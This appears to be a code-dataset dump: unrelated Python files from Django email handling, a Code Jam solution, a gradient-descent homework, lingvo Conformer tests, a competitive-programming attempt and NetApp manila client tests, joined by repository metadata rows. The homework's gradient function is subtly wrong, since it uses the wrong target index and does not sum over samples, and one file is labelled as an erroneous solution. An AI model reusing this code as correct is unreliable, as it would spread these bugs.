msg['Message-ID'] = make_msgid()
for name, value in self.extra_headers.items():
if name.lower() in ('from', 'to'): # From and To are already handled
continue
msg[name] = value
return msg
def recipients(self):
"""
Returns a list of all recipients of the email (includes direct
addressees as well as Cc and Bcc entries).
"""
return self.to + self.cc + self.bcc
def send(self, fail_silently=False):
"""Sends the email message."""
if not self.recipients():
# Don't bother creating the network connection if there's nobody to
# send to.
return 0
return self.get_connection(fail_silently).send_messages([self])
def attach(self, filename=None, content=None, mimetype=None):
"""
Attaches a file with the given filename and content. The filename can
be omitted and the mimetype is guessed, if not provided.
If the first parameter is a MIMEBase subclass it is inserted directly
into the resulting message attachments.
"""
if isinstance(filename, MIMEBase):
assert content == mimetype == None
self.attachments.append(filename)
else:
assert content is not None
self.attachments.append((filename, content, mimetype))
def attach_file(self, path, mimetype=None):
"""Attaches a file from the filesystem."""
filename = os.path.basename(path)
with open(path, 'rb') as f:
content = f.read()
self.attach(filename, content, mimetype)
def _create_message(self, msg):
return self._create_attachments(msg)
def _create_attachments(self, msg):
if self.attachments:
encoding = self.encoding or settings.DEFAULT_CHARSET
body_msg = msg
msg = SafeMIMEMultipart(_subtype=self.mixed_subtype, encoding=encoding)
if self.body:
msg.attach(body_msg)
for attachment in self.attachments:
if isinstance(attachment, MIMEBase):
msg.attach(attachment)
else:
msg.attach(self._create_attachment(*attachment))
return msg
def _create_mime_attachment(self, content, mimetype):
"""
Converts the content, mimetype pair into a MIME attachment object.
"""
basetype, subtype = mimetype.split('/', 1)
if basetype == 'text':
encoding = self.encoding or settings.DEFAULT_CHARSET
attachment = SafeMIMEText(content, subtype, encoding)
else:
# Encode non-text attachments with base64.
attachment = MIMEBase(basetype, subtype)
attachment.set_payload(content)
Encoders.encode_base64(attachment)
return attachment
def _create_attachment(self, filename, content, mimetype=None):
"""
Converts the filename, content, mimetype triple into a MIME attachment
object.
"""
if mimetype is None:
mimetype, _ = mimetypes.guess_type(filename)
if mimetype is None:
mimetype = DEFAULT_ATTACHMENT_MIME_TYPE
attachment = self._create_mime_attachment(content, mimetype)
if filename:
try:
filename.encode('ascii')
except UnicodeEncodeError:
if six.PY2:
filename = filename.encode('utf-8')
filename = ('utf-8', '', filename)
attachment.add_header('Content-Disposition', 'attachment',
filename=filename)
return attachment
class EmailMultiAlternatives(EmailMessage):
"""
A version of EmailMessage that makes it easy to send multipart/alternative
messages. For example, including text and HTML versions of the text is
made easier.
"""
alternative_subtype = 'alternative'
def __init__(self, subject='', body='', from_email=None, to=None, bcc=None,
connection=None, attachments=None, headers=None, alternatives=None,
cc=None):
"""
Initialize a single email message (which can be sent to multiple
recipients).
All strings used to create the message can be unicode strings (or UTF-8
bytestrings). The SafeMIMEText class will handle any necessary encoding
conversions.
"""
super(EmailMultiAlternatives, self).__init__(subject, body, from_email, to, bcc, connection, attachments, headers, cc)
self.alternatives = alternatives or []
def attach_alternative(self, content, mimetype):
"""Attach an alternative content representation."""
assert content is not None
assert mimetype is not None
self.alternatives.append((content, mimetype))
def _create_message(self, msg):
return self._create_attachments(self._create_alternatives(msg))
def _create_alternatives(self, msg):
encoding = self.encoding or settings.DEFAULT_CHARSET
if self.alternatives:
body_msg = msg
msg = SafeMIMEMultipart(_subtype=self.alternative_subtype, encoding=encoding)
if self.body:
msg.attach(body_msg)
for alternative in self.alternatives:
msg.attach(self._create_mime_attachment(*alternative))
return msg
| [
"[email protected]"
]
| |
d55042888f85b776d9c53eb7f35d5f535bf6f671 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_74/268.py | e90272ff021d33b8a2ee2f63dff93259a4e40e74 | []
| no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | def f(l):
begin={'O':1,'B':1}
last=l[0][0]
lasttime=0
result=0
for k in l:
robot=k[0]
if robot==last:
lasttime+=1+abs(k[1]-begin[robot])
result+=1+abs(k[1]-begin[robot])
begin[robot]=k[1]
else:
temp=abs(k[1]-begin[robot])
temp=max(temp,lasttime)
lasttime=1+temp-lasttime
result+=lasttime
begin[robot]=k[1]
last=robot
return result
def main():
s=input()
T=int(s)
for i in range(T):
s=input()
s=s.split(' ')
k=int(s[0])
s=s[1:]
l=[(s[2*i],int(s[2*i+1])) for i in range(k)]
print('Case #{0}: {1}'.format(i+1,f(l)))
main()
| [
"[email protected]"
]
| |
51f28b71ea08ed3bbd585cf7d38c3bdd57d362b4 | f6f4c87a1f2e750530a7d691da43514d84f99f5c | /hw12/a/q3.py | 6a3fdd0a408784e1ef313b123ef255e9c6c38d7a | []
| no_license | sarthak77/Basics-of-ML-AI | e941c6653bca95278cc62ee7ba229e8eaf4e309b | cb2ba9d271da919846211cf8496e29aff6beaa46 | refs/heads/master | 2020-07-25T10:33:54.420972 | 2020-01-09T19:25:57 | 2020-01-09T19:25:57 | 208,257,383 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,108 | py | import numpy as np
import matplotlib.pyplot as plt
def read_data(filename):
data = []
with open(filename,"r") as f:
lines = f.readlines()
for line in lines:
row = line.split("\t")
row = np.array(row).astype('float64')
data.append(row)
norm_data = []
mean = np.mean(data, axis=0)
for row in data:
temp = []
for i in range(6):
temp.append(row[i]/mean[i])
norm_data.append(temp)
return norm_data
def MSE_Gradient(w,data):
neg_grad = np.zeros(6)
for i in range(len(data)):
x = data[i]
x[5] = 1
x = np.array(x)
y = data[5]
neg_grad = ((np.dot(w,x) - y) * x)
return neg_grad
def MSE_Loss(w,data):
loss = 0
for i in range(len(data)):
x = data[i]
x[5] = 1
x = np.array(x)
y = data[i][5]
loss += ((np.dot(w,x) - y)**2)
return loss/len(data)
# Normal GDE
def Normal_GDE(data):
print("Normal GDE")
alpha = 0.00005
iters = 0
w = np.zeros(6)
prev_loss = 10
loss = MSE_Loss(w,data)
while prev_loss > 1e-3 and abs(prev_loss - loss) > 1e-5 :
# loss is pretty less or loss doesn't change much
iters += 1
prev_loss = loss
print("ITERATION = ",iters,", Loss = ",loss)
gradient = MSE_Gradient(w,data)
w = w - alpha*gradient
loss = MSE_Loss(w,data)
print("FINAL W = ",w," AFTER ",iters," ITERATIONS ")
# Optimized Learning Rate GDE
def Optimized_Learning_GDE(data):
print("OPTIMIZED LEARNING RATE GDE")
iters = 0
w = np.zeros(6)
prev_loss = 10
loss = MSE_Loss(w,data)
while prev_loss > 1e-3 and abs(prev_loss - loss) > 1e-5 :
# loss is pretty less or loss doesn't change much
iters += 1
prev_loss = loss
print("ITERATION = ",iters,", Loss = ",loss)
gradient = MSE_Gradient(w,data)
hessian = np.zeros([6,6])
for i in range(0, len(data)):
x = data[i]
x[5] = 1
x = np.array(x)
hessian += np.outer(x,x)
alpha_opt = (np.linalg.norm(gradient)**2)/(np.dot(gradient,np.dot(hessian,gradient)))
w = w - alpha_opt*gradient
loss = MSE_Loss(w,data)
print("FINAL W = ",w,"\n AFTER ",iters," ITERATIONS AND LOSS = ",loss)
data = read_data("airfoil_self_noise.dat")
# Normal_GDE(data)
Optimized_Learning_GDE(data) | [
"[email protected]"
]
| |
16689823e89dd4a3b15cad04a6054513fc61b631 | 9cb0543499fd473a609b6cb19f0db921586f5b48 | /lingvo/core/conformer_layer_test.py | b2ded4a207307e78ff392a2aa6065a1f3785bc68 | [
"Apache-2.0"
]
| permissive | Harshs27/lingvo | bbb852eb3cd69b64813268857d91571241b12a40 | bd396e651488b2e2c4a7416be077b4a0226c87c8 | refs/heads/master | 2022-12-01T05:43:24.300541 | 2020-08-11T00:16:33 | 2020-08-11T00:17:08 | 286,606,464 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,289 | py | # Lint as: python3
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for conformer layers as in https://arxiv.org/abs/2005.08100."""
# Lint as: PY3
from absl.testing import parameterized
from lingvo import compat as tf
from lingvo.core import conformer_layer
from lingvo.core import test_utils
class LConvLayerTest(test_utils.TestCase, parameterized.TestCase):
def testBasic(self):
batch, seqlen, dim = 2, 16, 4
inputs = tf.zeros([batch, seqlen, dim])
paddings = tf.zeros([batch, seqlen])
p = conformer_layer.LConvLayer.CommonParams(input_dim=dim, kernel_size=3)
p.name = 'lconv_layer'
l = p.Instantiate()
outputs = l.FPropDefaultTheta(inputs, paddings)
with self.session() as sess:
tf.global_variables_initializer().run()
out_vals = sess.run(outputs)
print([x.shape for x in out_vals])
class ConformerLayerTest(test_utils.TestCase, parameterized.TestCase):
def testBasic(self):
batch, seqlen, dim, heads = 2, 32, 4, 2
context = 2
inputs = tf.zeros([batch, seqlen, dim])
paddings = tf.zeros([batch, seqlen])
p = conformer_layer.ConformerLayer.CommonParams(
input_dim=dim,
atten_num_heads=heads,
atten_left_context=context + 1,
atten_right_context=context,
kernel_size=3,
fflayer_hidden_dim=4 * dim)
p.name = 'conformer_layer'
l = p.Instantiate()
outputs = l.FPropDefaultTheta(inputs, paddings)
with self.session() as sess:
tf.global_variables_initializer().run()
out_vals = sess.run(outputs)
print([x.shape for x in out_vals])
if __name__ == '__main__':
tf.test.main()
| [
"[email protected]"
]
| |
26d874b2ef1277e4f7bbc5a3c0743aa9e19204b1 | 03a2c1eb549a66cc0cff72857963eccb0a56031d | /acmicpc/3106_error.py | cb083621f22b76ceccfd3a96d9d3a794dbb5ccd7 | []
| no_license | nobe0716/problem_solving | c56e24564dbe3a8b7093fb37cd60c9e0b25f8e59 | cd43dc1eddb49d6b5965419e36db708c300dadf5 | refs/heads/master | 2023-01-21T14:05:54.170065 | 2023-01-15T16:36:30 | 2023-01-15T16:36:30 | 80,906,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,011 | py | class Employee:
def __init__(self, _id, _income, _boss):
self.id = _id
self.income = _income
self.boss = _boss
class EmployeeGroup:
def __init__(self, _income, _employee, _bosses):
self.income = _income
self.employee = _employee
self.bosses = _bosses
def raiseIncome(employee_group_mapping, newbie):
if employee_group_mapping[newbie.boss.id].employee.id == newbie.boss.id and employee_group_mapping[newbie.boss.id].income < newbie.income: # succeed
employee_group = employee_group_mapping[newbie.boss.id]
employee_group.employee = newbie
employee_group.income = newbie.income
employee_group.bosses.append(newbie.boss)
else:
employee_group = EmployeeGroup(newbie.income, newbie, [])
employee_group_mapping[newbie.id] = employee_group
boss = newbie.boss
while boss is not None:
if boss not in employee_group.bosses:
employee_group_of_boss = employee_group_mapping[boss.id]
if employee_group_of_boss.income < employee_group.income:
employee_group_mapping[boss.id] = employee_group
employee_group.bosses.append(boss)
if employee_group_of_boss.employee.id == boss.id:
for e in employee_group_of_boss.bosses:
employee_group_mapping[e.id] = employee_group
employee_group.bosses += employee_group_of_boss.bosses
employee_group_of_boss.bosses.clear()
else:
employee_group_of_boss.bosses.remove(boss)
boss = boss.boss
return len(employee_group.bosses)
n = int(input())
i = int(input())
employees = [Employee(0, i, None)]
employee_group_mapping = {0:EmployeeGroup(i, employees[0], [])}
for id in range(1, n + 1):
i, b = map(int, input().split())
newbie = Employee(id, i, employees[b])
employees.append(newbie)
print(raiseIncome(employee_group_mapping, newbie))
| [
"[email protected]"
]
| |
b0a538508972c28c67ab59ada3be21cef0904ac3 | bc65ef147e4724be72475e0caa9bbb2c3e9e8f15 | /manila/tests/share/drivers/netapp/dataontap/client/test_client_cmode.py | fc6c504b9190018fd721dd737c5de6b84932cbda | [
"Apache-2.0"
]
| permissive | scottwedge/manila-base | d3c8dc8fa40131033ae55b8d874c4c0d18009fbd | dcb972cfad38b2826301b7ca86062689577e32e3 | refs/heads/master | 2021-03-01T01:55:47.047392 | 2020-03-08T03:40:00 | 2020-03-08T03:40:00 | 245,746,428 | 0 | 0 | Apache-2.0 | 2020-03-08T03:37:21 | 2020-03-08T03:37:21 | null | UTF-8 | Python | false | false | 188,711 | py | # Copyright (c) 2014 Alex Meade. All rights reserved.
# Copyright (c) 2015 Clinton Knight. All rights reserved.
# Copyright (c) 2015 Tom Barron. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import hashlib
import time
import ddt
import mock
from oslo_log import log
import six
from manila import exception
from manila.share.drivers.netapp.dataontap.client import api as netapp_api
from manila.share.drivers.netapp.dataontap.client import client_base
from manila.share.drivers.netapp.dataontap.client import client_cmode
from manila import test
from manila.tests.share.drivers.netapp.dataontap.client import fakes as fake
@ddt.ddt
class NetAppClientCmodeTestCase(test.TestCase):
def setUp(self):
super(NetAppClientCmodeTestCase, self).setUp()
# Mock loggers as themselves to allow logger arg validation
mock_logger = log.getLogger('mock_logger')
self.mock_object(client_cmode.LOG,
'error',
mock.Mock(side_effect=mock_logger.error))
self.mock_object(client_cmode.LOG,
'warning',
mock.Mock(side_effect=mock_logger.warning))
self.mock_object(client_cmode.LOG,
'debug',
mock.Mock(side_effect=mock_logger.debug))
self.mock_object(client_base.NetAppBaseClient,
'get_ontapi_version',
mock.Mock(return_value=(1, 20)))
self.client = client_cmode.NetAppCmodeClient(**fake.CONNECTION_INFO)
self.client.connection = mock.MagicMock()
self.vserver_client = client_cmode.NetAppCmodeClient(
**fake.CONNECTION_INFO)
self.vserver_client.set_vserver(fake.VSERVER_NAME)
self.vserver_client.connection = mock.MagicMock()
def _mock_api_error(self, code='fake'):
return mock.Mock(side_effect=netapp_api.NaApiError(code=code))
def test_init_features_ontapi_1_21(self):
self.mock_object(client_base.NetAppBaseClient,
'get_ontapi_version',
mock.Mock(return_value=(1, 21)))
self.client._init_features()
self.assertFalse(self.client.features.BROADCAST_DOMAINS)
self.assertFalse(self.client.features.IPSPACES)
self.assertFalse(self.client.features.SUBNETS)
@ddt.data((1, 30), (1, 40), (2, 0))
def test_init_features_ontapi_1_30(self, ontapi_version):
self.mock_object(client_base.NetAppBaseClient,
'get_ontapi_version',
mock.Mock(return_value=ontapi_version))
self.client._init_features()
self.assertTrue(self.client.features.BROADCAST_DOMAINS)
self.assertTrue(self.client.features.IPSPACES)
self.assertTrue(self.client.features.SUBNETS)
def test_invoke_vserver_api(self):
self.client._invoke_vserver_api('fake-api', 'fake_vserver')
self.client.connection.set_vserver.assert_has_calls(
[mock.call('fake_vserver')])
self.client.connection.invoke_successfully.assert_has_calls(
[mock.call('fake-api', True)])
def test_has_records(self):
self.assertTrue(self.client._has_records(
netapp_api.NaElement(fake.VSERVER_GET_ITER_RESPONSE)))
def test_has_records_not_found(self):
self.assertFalse(self.client._has_records(
netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)))
@ddt.data((fake.VSERVER_GET_ITER_RESPONSE, 1),
(fake.NO_RECORDS_RESPONSE, 0))
@ddt.unpack
def test_get_record_count(self, response, expected):
api_response = netapp_api.NaElement(response)
result = self.client._get_record_count(api_response)
self.assertEqual(expected, result)
def test_get_records_count_invalid(self):
api_response = netapp_api.NaElement(
fake.INVALID_GET_ITER_RESPONSE_NO_RECORDS)
self.assertRaises(exception.NetAppException,
self.client._get_record_count,
api_response)
def test_send_iter_request(self):
api_responses = [
netapp_api.NaElement(fake.STORAGE_DISK_GET_ITER_RESPONSE_PAGE_1),
netapp_api.NaElement(fake.STORAGE_DISK_GET_ITER_RESPONSE_PAGE_2),
netapp_api.NaElement(fake.STORAGE_DISK_GET_ITER_RESPONSE_PAGE_3),
]
mock_send_request = self.mock_object(
self.client, 'send_request',
mock.Mock(side_effect=api_responses))
storage_disk_get_iter_args = {
'desired-attributes': {
'storage-disk-info': {
'disk-name': None,
}
}
}
result = self.client.send_iter_request(
'storage-disk-get-iter', api_args=storage_disk_get_iter_args,
max_page_length=10)
num_records = result.get_child_content('num-records')
self.assertEqual('28', num_records)
next_tag = result.get_child_content('next-tag')
self.assertEqual('', next_tag)
args1 = copy.deepcopy(storage_disk_get_iter_args)
args1['max-records'] = 10
args2 = copy.deepcopy(storage_disk_get_iter_args)
args2['max-records'] = 10
args2['tag'] = 'next_tag_1'
args3 = copy.deepcopy(storage_disk_get_iter_args)
args3['max-records'] = 10
args3['tag'] = 'next_tag_2'
mock_send_request.assert_has_calls([
mock.call('storage-disk-get-iter', args1),
mock.call('storage-disk-get-iter', args2),
mock.call('storage-disk-get-iter', args3),
])
def test_send_iter_request_single_page(self):
api_response = netapp_api.NaElement(
fake.STORAGE_DISK_GET_ITER_RESPONSE)
mock_send_request = self.mock_object(
self.client, 'send_request',
mock.Mock(return_value=api_response))
storage_disk_get_iter_args = {
'desired-attributes': {
'storage-disk-info': {
'disk-name': None,
}
}
}
result = self.client.send_iter_request(
'storage-disk-get-iter', api_args=storage_disk_get_iter_args,
max_page_length=10)
num_records = result.get_child_content('num-records')
self.assertEqual('1', num_records)
args = copy.deepcopy(storage_disk_get_iter_args)
args['max-records'] = 10
mock_send_request.assert_has_calls([
mock.call('storage-disk-get-iter', args),
])
def test_send_iter_request_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
mock_send_request = self.mock_object(
self.client, 'send_request',
mock.Mock(return_value=api_response))
result = self.client.send_iter_request('storage-disk-get-iter')
num_records = result.get_child_content('num-records')
self.assertEqual('0', num_records)
args = {'max-records': client_cmode.DEFAULT_MAX_PAGE_LENGTH}
mock_send_request.assert_has_calls([
mock.call('storage-disk-get-iter', args),
])
@ddt.data(fake.INVALID_GET_ITER_RESPONSE_NO_ATTRIBUTES,
fake.INVALID_GET_ITER_RESPONSE_NO_RECORDS)
def test_send_iter_request_invalid(self, fake_response):
api_response = netapp_api.NaElement(fake_response)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
self.assertRaises(exception.NetAppException,
self.client.send_iter_request,
'storage-disk-get-iter')
def test_set_vserver(self):
self.client.set_vserver(fake.VSERVER_NAME)
self.client.connection.set_vserver.assert_has_calls(
[mock.call('fake_vserver')])
def test_vserver_exists(self):
api_response = netapp_api.NaElement(fake.VSERVER_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
vserver_get_args = {
'query': {'vserver-info': {'vserver-name': fake.VSERVER_NAME}},
'desired-attributes': {'vserver-info': {'vserver-name': None}}
}
result = self.client.vserver_exists(fake.VSERVER_NAME)
self.client.send_iter_request.assert_has_calls([
mock.call('vserver-get-iter', vserver_get_args)])
self.assertTrue(result)
def test_vserver_exists_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.vserver_exists(fake.VSERVER_NAME)
self.assertFalse(result)
def test_create_vserver_no_ipspace(self):
self.mock_object(self.client, 'send_request')
vserver_create_args = {
'vserver-name': fake.VSERVER_NAME,
'root-volume-security-style': 'unix',
'root-volume-aggregate': fake.ROOT_VOLUME_AGGREGATE_NAME,
'root-volume': fake.ROOT_VOLUME_NAME,
'name-server-switch': {'nsswitch': 'file'}
}
vserver_modify_args = {
'aggr-list': [{'aggr-name': aggr_name} for aggr_name
in fake.SHARE_AGGREGATE_NAMES],
'vserver-name': fake.VSERVER_NAME
}
self.client.create_vserver(fake.VSERVER_NAME,
fake.ROOT_VOLUME_AGGREGATE_NAME,
fake.ROOT_VOLUME_NAME,
fake.SHARE_AGGREGATE_NAMES,
None)
self.client.send_request.assert_has_calls([
mock.call('vserver-create', vserver_create_args),
mock.call('vserver-modify', vserver_modify_args)])
def test_create_vserver_with_ipspace(self):
self.client.features.add_feature('IPSPACES')
self.mock_object(self.client, 'send_request')
vserver_create_args = {
'vserver-name': fake.VSERVER_NAME,
'root-volume-security-style': 'unix',
'root-volume-aggregate': fake.ROOT_VOLUME_AGGREGATE_NAME,
'root-volume': fake.ROOT_VOLUME_NAME,
'name-server-switch': {'nsswitch': 'file'},
'ipspace': fake.IPSPACE_NAME,
}
vserver_modify_args = {
'aggr-list': [{'aggr-name': aggr_name} for aggr_name
in fake.SHARE_AGGREGATE_NAMES],
'vserver-name': fake.VSERVER_NAME
}
self.client.create_vserver(fake.VSERVER_NAME,
fake.ROOT_VOLUME_AGGREGATE_NAME,
fake.ROOT_VOLUME_NAME,
fake.SHARE_AGGREGATE_NAMES,
fake.IPSPACE_NAME)
self.client.send_request.assert_has_calls([
mock.call('vserver-create', vserver_create_args),
mock.call('vserver-modify', vserver_modify_args)])
def test_create_vserver_ipspaces_not_supported(self):
self.assertRaises(exception.NetAppException,
self.client.create_vserver,
fake.VSERVER_NAME,
fake.ROOT_VOLUME_AGGREGATE_NAME,
fake.ROOT_VOLUME_NAME,
fake.SHARE_AGGREGATE_NAMES,
fake.IPSPACE_NAME)
def test_get_vserver_root_volume_name(self):
api_response = netapp_api.NaElement(
fake.VSERVER_GET_ROOT_VOLUME_NAME_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
vserver_get_args = {
'query': {'vserver-info': {'vserver-name': fake.VSERVER_NAME}},
'desired-attributes': {'vserver-info': {'root-volume': None}}
}
result = self.client.get_vserver_root_volume_name(fake.VSERVER_NAME)
self.client.send_iter_request.assert_has_calls([
mock.call('vserver-get-iter', vserver_get_args)])
self.assertEqual(fake.ROOT_VOLUME_NAME, result)
def test_get_vserver_root_volume_name_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
self.assertRaises(exception.NetAppException,
self.client.get_vserver_root_volume_name,
fake.VSERVER_NAME)
def test_get_vserver_ipspace(self):
self.client.features.add_feature('IPSPACES')
api_response = netapp_api.NaElement(
fake.VSERVER_GET_IPSPACE_NAME_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_vserver_ipspace(fake.VSERVER_NAME)
vserver_get_iter_args = {
'query': {
'vserver-info': {
'vserver-name': fake.VSERVER_NAME,
},
},
'desired-attributes': {
'vserver-info': {
'ipspace': None,
},
},
}
self.client.send_iter_request.assert_has_calls([
mock.call('vserver-get-iter', vserver_get_iter_args)])
self.assertEqual(fake.IPSPACE_NAME, result)
def test_get_vserver_ipspace_not_supported(self):
result = self.client.get_vserver_ipspace(fake.IPSPACE_NAME)
self.assertIsNone(result)
def test_get_vserver_ipspace_not_found(self):
self.client.features.add_feature('IPSPACES')
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
self.assertRaises(exception.NetAppException,
self.client.get_vserver_ipspace,
fake.IPSPACE_NAME)
def test_ipspace_has_data_vservers(self):
self.client.features.add_feature('IPSPACES')
api_response = netapp_api.NaElement(fake.VSERVER_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.ipspace_has_data_vservers(fake.IPSPACE_NAME)
vserver_get_iter_args = {
'query': {
'vserver-info': {
'ipspace': fake.IPSPACE_NAME,
'vserver-type': 'data'
},
},
'desired-attributes': {
'vserver-info': {
'vserver-name': None,
},
},
}
self.client.send_iter_request.assert_has_calls([
mock.call('vserver-get-iter', vserver_get_iter_args)])
self.assertTrue(result)
def test_ipspace_has_data_vservers_not_supported(self):
result = self.client.ipspace_has_data_vservers(fake.IPSPACE_NAME)
self.assertFalse(result)
def test_ipspace_has_data_vservers_not_found(self):
self.client.features.add_feature('IPSPACES')
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.ipspace_has_data_vservers(fake.IPSPACE_NAME)
self.assertFalse(result)
def test_list_vservers(self):
api_response = netapp_api.NaElement(
fake.VSERVER_DATA_LIST_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.list_vservers()
vserver_get_iter_args = {
'query': {
'vserver-info': {
'vserver-type': 'data'
}
},
'desired-attributes': {
'vserver-info': {
'vserver-name': None
}
}
}
self.client.send_iter_request.assert_has_calls([
mock.call('vserver-get-iter', vserver_get_iter_args)])
self.assertListEqual([fake.VSERVER_NAME], result)
def test_list_vservers_node_type(self):
api_response = netapp_api.NaElement(
fake.VSERVER_DATA_LIST_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.list_vservers(vserver_type='node')
vserver_get_iter_args = {
'query': {
'vserver-info': {
'vserver-type': 'node'
}
},
'desired-attributes': {
'vserver-info': {
'vserver-name': None
}
}
}
self.client.send_iter_request.assert_has_calls([
mock.call('vserver-get-iter', vserver_get_iter_args)])
self.assertListEqual([fake.VSERVER_NAME], result)
def test_list_vservers_not_found(self):
api_response = netapp_api.NaElement(
fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.list_vservers(vserver_type='data')
self.assertListEqual([], result)
def test_get_vserver_volume_count(self):
api_response = netapp_api.NaElement(fake.VOLUME_COUNT_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_vserver_volume_count()
self.assertEqual(2, result)
def test_delete_vserver_no_volumes(self):
self.mock_object(self.client,
'vserver_exists',
mock.Mock(return_value=True))
self.mock_object(self.client,
'get_vserver_root_volume_name',
mock.Mock(return_value=fake.ROOT_VOLUME_NAME))
self.mock_object(self.vserver_client,
'get_vserver_volume_count',
mock.Mock(return_value=0))
self.mock_object(self.client, '_terminate_vserver_services')
self.mock_object(self.client, 'send_request')
self.client.delete_vserver(
fake.VSERVER_NAME,
self.vserver_client,
security_services=[fake.CIFS_SECURITY_SERVICE])
self.client._terminate_vserver_services.assert_called_with(
fake.VSERVER_NAME, self.vserver_client,
[fake.CIFS_SECURITY_SERVICE])
vserver_destroy_args = {'vserver-name': fake.VSERVER_NAME}
self.client.send_request.assert_has_calls([
mock.call('vserver-destroy', vserver_destroy_args)])
def test_delete_vserver_one_volume(self):
self.mock_object(self.client,
'vserver_exists',
mock.Mock(return_value=True))
self.mock_object(self.client,
'get_vserver_root_volume_name',
mock.Mock(return_value=fake.ROOT_VOLUME_NAME))
self.mock_object(self.vserver_client,
'get_vserver_volume_count',
mock.Mock(return_value=1))
self.mock_object(self.client, 'send_request')
self.mock_object(self.vserver_client, 'offline_volume')
self.mock_object(self.vserver_client, 'delete_volume')
self.client.delete_vserver(fake.VSERVER_NAME,
self.vserver_client)
self.vserver_client.offline_volume.assert_called_with(
fake.ROOT_VOLUME_NAME)
self.vserver_client.delete_volume.assert_called_with(
fake.ROOT_VOLUME_NAME)
vserver_destroy_args = {'vserver-name': fake.VSERVER_NAME}
self.client.send_request.assert_has_calls([
mock.call('vserver-destroy', vserver_destroy_args)])
def test_delete_vserver_one_volume_already_offline(self):
self.mock_object(self.client,
'vserver_exists',
mock.Mock(return_value=True))
self.mock_object(self.client,
'get_vserver_root_volume_name',
mock.Mock(return_value=fake.ROOT_VOLUME_NAME))
self.mock_object(self.vserver_client,
'get_vserver_volume_count',
mock.Mock(return_value=1))
self.mock_object(self.client, 'send_request')
self.mock_object(self.vserver_client,
'offline_volume',
self._mock_api_error(code=netapp_api.EVOLUMEOFFLINE))
self.mock_object(self.vserver_client, 'delete_volume')
self.client.delete_vserver(fake.VSERVER_NAME,
self.vserver_client)
self.vserver_client.offline_volume.assert_called_with(
fake.ROOT_VOLUME_NAME)
self.vserver_client.delete_volume.assert_called_with(
fake.ROOT_VOLUME_NAME)
vserver_destroy_args = {'vserver-name': fake.VSERVER_NAME}
self.client.send_request.assert_has_calls([
mock.call('vserver-destroy', vserver_destroy_args)])
self.assertEqual(1, client_cmode.LOG.error.call_count)
def test_delete_vserver_one_volume_api_error(self):
self.mock_object(self.client,
'vserver_exists',
mock.Mock(return_value=True))
self.mock_object(self.client,
'get_vserver_root_volume_name',
mock.Mock(return_value=fake.ROOT_VOLUME_NAME))
self.mock_object(self.vserver_client,
'get_vserver_volume_count',
mock.Mock(return_value=1))
self.mock_object(self.client, 'send_request')
self.mock_object(self.vserver_client,
'offline_volume',
self._mock_api_error())
self.mock_object(self.vserver_client, 'delete_volume')
self.assertRaises(netapp_api.NaApiError,
self.client.delete_vserver,
fake.VSERVER_NAME,
self.vserver_client)
def test_delete_vserver_multiple_volumes(self):
self.mock_object(self.client,
'vserver_exists',
mock.Mock(return_value=True))
self.mock_object(self.client,
'get_vserver_root_volume_name',
mock.Mock(return_value=fake.ROOT_VOLUME_NAME))
self.mock_object(self.vserver_client,
'get_vserver_volume_count',
mock.Mock(return_value=2))
self.assertRaises(exception.NetAppException,
self.client.delete_vserver,
fake.VSERVER_NAME,
self.vserver_client)
def test_delete_vserver_not_found(self):
self.mock_object(self.client,
'vserver_exists',
mock.Mock(return_value=False))
self.client.delete_vserver(fake.VSERVER_NAME,
self.vserver_client)
self.assertEqual(1, client_cmode.LOG.error.call_count)
def test_terminate_vserver_services(self):
self.mock_object(self.vserver_client, 'send_request')
